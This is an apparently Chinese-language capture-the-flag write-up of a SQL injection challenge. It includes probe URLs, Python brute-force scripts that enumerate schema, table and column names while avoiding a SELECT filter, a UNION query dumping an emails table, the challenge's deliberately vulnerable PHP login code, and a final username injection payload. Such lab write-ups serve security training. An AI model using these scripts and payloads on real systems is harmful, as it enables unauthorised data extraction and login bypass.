0x01 题目
0x02 解题思路
访问题目地址
题目和返回内容提示很明显,sql注入,请求
http://59.110.159.206:7010/?id=1%20and%201=1
正常返回,id参数存在sql注入
继续尝试
http://59.110.159.206:7010/?id=-1%20union%20select%201,2
返回
存在select过滤,尝试讲select
大小写、编码都无法绕过,所以继续深入注入不能使用select
这里参考了
https://blog.csdn.net/aloneBUThappy/article/details/122047088
爆破数据库脚本
import requests
fuzz_ascii = list(range(48,58))+list(range(65,91))+list(range(95,123)) # [0-9A-Za-z_]
for i in fuzz_ascii:
res = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security"+chr(i)+"','',4,5,6)<=(table information_schema.schemata limit 1,1)")
if 'Dumb' in res.text:
print("<=: {0}".format(chr(i)))
else:
print(">: {0}".format(chr(i)))
爆破表脚本
确认表属性的位置
import requests
fuzz_ascii = range(1,500)
test = []
for i in fuzz_ascii:
res1 = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','z','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) >= (table information_schema.tables limit "+str(i)+",1)--+")
res2 = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','0','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) <=(table information_schema.tables limit "+str(i)+",1)--+")
if 'Dumb' in res1.text and 'Dumb' in res2.text:
print("<=: {0}".format(i))
test.append(i)
print test
爆破表名
import requests
fuzz_ascii = list(range(48,58))+list(range(65,91))+list(range(95,123)) # [0-9A-Za-z_]
for i in fuzz_ascii:
res = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','users"+chr(i)+"','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21) >= (table information_schema.tables limit 81,1)--+")
if 'Dumb' in res.text:
print("<=: {0}".format(chr(i)))
else:
print(">: {0}".format(chr(i)))
爆破列的脚本
确认列属性位置
import requests
fuzz_ascii = range(1,10000)
test = []
for i in fuzz_ascii:
res1 = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','flag','z','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) >= (table information_schema.columns limit "+str(i)+",1)--+")
res2 = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','flag','0','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) <=(table information_schema.columns limit "+str(i)+",1)--+")
if 'Dumb' in res1.text and 'Dumb' in res2.text:
print("<=: {0}".format(i))
test.append(i)
print test
爆破列名
import requests
fuzz_ascii = list(range(48,58))+list(range(65,91))+list(range(95,123)) # [0-9A-Za-z_]
for i in fuzz_ascii:
res = requests.get("http://59.110.159.206:7010/?id=1 and ('def','security','emails','"+chr(i)+"','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22) >= (table information_schema.columns limit 739,1)--+")
if 'Dumb' in res.text:
print("<=: {0}".format(chr(i)))
else:
print(">: {0}".format(chr(i)))
根据题目要求,查询emails表下的内容
http://59.110.159.206:7010/?id=-1%20union%20table%20security.emails%20limit%207,1
返回
获得beaxia的email地址,提交flag不对,继续深入,根据email地址名请求
http://59.110.159.206:7010/ypHeMPardErE.zip
获得一个压缩包,解压只有一个index.php文件
打开查看应该是之前注入页面的代码
<?php
include "./config.php";
// error_reporting(0);
// highlight_file(__FILE__);
$conn = mysqli_connect($hostname, $username, $password, $database);
if ($conn->connect_errno) {
die("Connection failed: " . $conn->connect_errno);
}
echo "Where is the database?"."<br>";
echo "try ?id";
function sqlWaf($s)
{
$filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i';
if (preg_match($filter,$s))
return False;
return True;
}
if (isset($_GET['id']))
{
$id = $_GET['id'];
$sql = "select * from users where id=$id";
$safe = preg_match('/select/is', $id);
if($safe!==0)
die("No select!");
$result = mysqli_query($conn, $sql);
if ($result)
{
$row = mysqli_fetch_array($result);
echo "<h3>" . $row['username'] . "</h3><br>";
echo "<h3>" . $row['passwd'] . "</h3>";
}
else
die('<br>Error!');
}
if (isset($_POST['username']) && isset($_POST['passwd']))
{
$username = strval($_POST['username']);
$passwd = strval($_POST['passwd']);
if ( !sqlWaf($passwd) )
die('damn hacker');
$sql = "SELECT * FROM users WHERE username='${username}' AND passwd= '${passwd}'";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
$row = $result->fetch_assoc();
if ( $row['username'] === 'admin' && $row['passwd'] )
{
if ($row['passwd'] == $passwd)
{
die($flag);
} else {
die("username or passwd wrong, are you admin?");
}
} else {
die("wrong user");
}
} else {
die("user not exist or wrong passwd");
}
}
mysqli_close($conn);
?>
通过代码可以看到id参数的select被过滤,还可以看到代码通过post接收username
和passwd
参数,passwd
参数被过滤,username
参数没有被过滤
可以通过username
注入,提交username
必须为admin
,并且后面需要通过$row['passwd'] == $passwd
构造post参数
username=admin' union select 9, 'admin', 'I-kill-you'-- &passwd=I-kill-you
得到flag
本文暂时没有评论,来添加一个吧(●'◡'●)